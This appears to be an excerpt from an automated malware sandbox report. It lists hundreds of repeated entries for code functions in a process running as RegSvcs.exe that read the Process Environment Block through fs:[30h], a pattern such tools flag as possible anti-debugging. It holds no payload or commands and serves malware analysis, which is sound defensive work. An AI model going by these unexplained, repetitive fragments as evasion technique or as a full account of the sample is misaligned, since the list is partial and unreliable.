Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011663C0 mov eax, dword ptr fs:[00000030h] 9_2_011663C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F03E9 mov eax, dword ptr fs:[00000030h] 9_2_010F03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B53FC mov eax, dword ptr fs:[00000030h] 9_2_011B53FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011163FF mov eax, dword ptr fs:[00000030h] 9_2_011163FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010FE3F0 mov eax, dword ptr fs:[00000030h] 9_2_010FE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010FE3F0 mov eax, dword ptr fs:[00000030h] 9_2_010FE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010FE3F0 mov eax, dword ptr fs:[00000030h] 9_2_010FE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119F3E6 mov eax, dword ptr fs:[00000030h] 9_2_0119F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01117208 mov eax, dword ptr fs:[00000030h] 9_2_01117208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01117208 mov eax, dword ptr fs:[00000030h] 9_2_01117208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D823B mov eax, dword ptr fs:[00000030h] 9_2_010D823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B5227 mov eax, dword ptr fs:[00000030h] 9_2_011B5227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0116D250 mov ecx, dword ptr fs:[00000030h] 9_2_0116D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D9240 mov eax, dword ptr fs:[00000030h] 9_2_010D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D9240 mov eax, dword ptr fs:[00000030h] 9_2_010D9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119B256 mov eax, dword ptr fs:[00000030h] 9_2_0119B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119B256 mov eax, dword ptr fs:[00000030h] 9_2_0119B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01168243 mov eax, dword ptr fs:[00000030h] 9_2_01168243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01168243 mov ecx, dword ptr fs:[00000030h] 9_2_01168243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E6259 mov eax, dword ptr fs:[00000030h] 9_2_010E6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111724D mov eax, dword ptr fs:[00000030h] 9_2_0111724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DA250 mov eax, dword ptr fs:[00000030h] 9_2_010DA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01121270 mov eax, dword ptr fs:[00000030h] 9_2_01121270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01121270 mov eax, dword ptr fs:[00000030h] 9_2_01121270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01109274 mov eax, dword ptr fs:[00000030h] 9_2_01109274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D826B mov eax, dword ptr fs:[00000030h] 9_2_010D826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01190274 mov eax, dword ptr fs:[00000030h] 9_2_01190274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E4260 mov eax, dword ptr fs:[00000030h] 9_2_010E4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E4260 mov eax, dword ptr fs:[00000030h] 9_2_010E4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E4260 mov eax, dword ptr fs:[00000030h] 9_2_010E4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011AD26B mov eax, dword ptr fs:[00000030h] 9_2_011AD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011AD26B mov eax, dword ptr fs:[00000030h] 9_2_011AD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111329E mov eax, dword ptr fs:[00000030h] 9_2_0111329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111329E mov eax, dword ptr fs:[00000030h] 9_2_0111329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01160283 mov eax, dword ptr fs:[00000030h] 9_2_01160283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01160283 mov eax, dword ptr fs:[00000030h] 9_2_01160283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01160283 mov eax, dword ptr fs:[00000030h] 9_2_01160283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111E284 mov eax, dword ptr fs:[00000030h] 9_2_0111E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111E284 mov eax, dword ptr fs:[00000030h] 9_2_0111E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B5283 mov eax, dword ptr fs:[00000030h] 9_2_011B5283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011692BC mov eax, dword ptr fs:[00000030h] 9_2_011692BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011692BC mov eax, dword ptr fs:[00000030h] 9_2_011692BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011692BC mov ecx, dword ptr fs:[00000030h] 9_2_011692BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011692BC mov ecx, dword ptr fs:[00000030h] 9_2_011692BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F02A0 mov eax, dword ptr fs:[00000030h] 9_2_010F02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F02A0 mov eax, dword ptr fs:[00000030h] 9_2_010F02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h] 9_2_010F52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h] 9_2_010F52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h] 9_2_010F52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F52A0 mov eax, dword ptr fs:[00000030h] 9_2_010F52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h] 9_2_011762A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011762A0 mov ecx, dword ptr fs:[00000030h] 9_2_011762A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h] 9_2_011762A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h] 9_2_011762A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h] 9_2_011762A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011762A0 mov eax, dword ptr fs:[00000030h] 9_2_011762A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011772A0 mov eax, dword ptr fs:[00000030h] 9_2_011772A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011772A0 mov eax, dword ptr fs:[00000030h] 9_2_011772A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h] 9_2_011A92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h] 9_2_011A92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h] 9_2_011A92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011A92A6 mov eax, dword ptr fs:[00000030h] 9_2_011A92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110F2D0 mov eax, dword ptr fs:[00000030h] 9_2_0110F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110F2D0 mov eax, dword ptr fs:[00000030h] 9_2_0110F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E92C5 mov eax, dword ptr fs:[00000030h] 9_2_010E92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010E92C5 mov eax, dword ptr fs:[00000030h] 9_2_010E92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h] 9_2_010EA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h] 9_2_010EA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h] 9_2_010EA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h] 9_2_010EA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010EA2C3 mov eax, dword ptr fs:[00000030h] 9_2_010EA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110B2C0 mov eax, dword ptr fs:[00000030h] 9_2_0110B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DB2D3 mov eax, dword ptr fs:[00000030h] 9_2_010DB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DB2D3 mov eax, dword ptr fs:[00000030h] 9_2_010DB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010DB2D3 mov eax, dword ptr fs:[00000030h] 9_2_010DB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119F2F8 mov eax, dword ptr fs:[00000030h] 9_2_0119F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F02E1 mov eax, dword ptr fs:[00000030h] 9_2_010F02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F02E1 mov eax, dword ptr fs:[00000030h] 9_2_010F02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F02E1 mov eax, dword ptr fs:[00000030h] 9_2_010F02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010D92FF mov eax, dword ptr fs:[00000030h] 9_2_010D92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011912ED mov eax, dword ptr fs:[00000030h] 9_2_011912ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B52E2 mov eax, dword ptr fs:[00000030h] 9_2_011B52E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01117505 mov eax, dword ptr fs:[00000030h] 9_2_01117505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01117505 mov ecx, dword ptr fs:[00000030h] 9_2_01117505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h] 9_2_011B4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111D530 mov eax, dword ptr fs:[00000030h] 9_2_0111D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0111D530 mov eax, dword ptr fs:[00000030h] 9_2_0111D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_011B5537 mov eax, dword ptr fs:[00000030h] 9_2_011B5537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h] 9_2_0110E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h] 9_2_0110E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h] 9_2_0110E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h] 9_2_0110E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0110E53E mov eax, dword ptr fs:[00000030h] 9_2_0110E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0119B52F mov eax, dword ptr fs:[00000030h] 9_2_0119B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h] 9_2_010F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h] 9_2_010F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h] 9_2_010F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h] 9_2_010F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h] 9_2_010F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010F0535 mov eax, dword ptr fs:[00000030h] 9_2_010F0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h] 9_2_010ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h] 9_2_010ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h] 9_2_010ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h] 9_2_010ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h] 9_2_010ED534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_010ED534 mov eax, dword ptr fs:[00000030h] 9_2_010ED534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118F525 mov eax, dword ptr fs:[00000030h]9_2_0118F525
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E8550 mov eax, dword ptr fs:[00000030h]9_2_010E8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E8550 mov eax, dword ptr fs:[00000030h]9_2_010E8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111B570 mov eax, dword ptr fs:[00000030h]9_2_0111B570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111B570 mov eax, dword ptr fs:[00000030h]9_2_0111B570
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB562 mov eax, dword ptr fs:[00000030h]9_2_010DB562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111656A mov eax, dword ptr fs:[00000030h]9_2_0111656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111656A mov eax, dword ptr fs:[00000030h]9_2_0111656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111656A mov eax, dword ptr fs:[00000030h]9_2_0111656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D758F mov eax, dword ptr fs:[00000030h]9_2_010D758F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D758F mov eax, dword ptr fs:[00000030h]9_2_010D758F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D758F mov eax, dword ptr fs:[00000030h]9_2_010D758F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116B594 mov eax, dword ptr fs:[00000030h]9_2_0116B594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116B594 mov eax, dword ptr fs:[00000030h]9_2_0116B594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2582 mov eax, dword ptr fs:[00000030h]9_2_010E2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2582 mov ecx, dword ptr fs:[00000030h]9_2_010E2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E59C mov eax, dword ptr fs:[00000030h]9_2_0111E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01114588 mov eax, dword ptr fs:[00000030h]9_2_01114588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
